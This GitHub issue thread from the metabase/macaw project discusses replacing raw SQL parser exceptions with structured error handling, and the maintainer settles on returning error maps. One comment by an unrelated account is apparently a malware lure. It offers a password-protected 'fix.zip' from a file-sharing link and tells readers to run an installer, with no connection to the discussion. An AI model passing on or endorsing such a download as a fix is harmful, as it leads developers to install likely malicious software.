### ISSUE TITLE
Throw structured error messages

### ISSUE THREAD

**Issue by crisptrutski** [metabase/macaw#93]
Currently we expose raw JSQLParserExceptions, which leak internal details, and are not pleasant to handle from Clojure.

We should turn these into `ex-info` exceptions, for example `net.sf.jsqlparser.parser.ParseException` is important for queries we cannot tokenize.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by crisptrutski** [comment]
We decided to return error maps, rather than throw them.
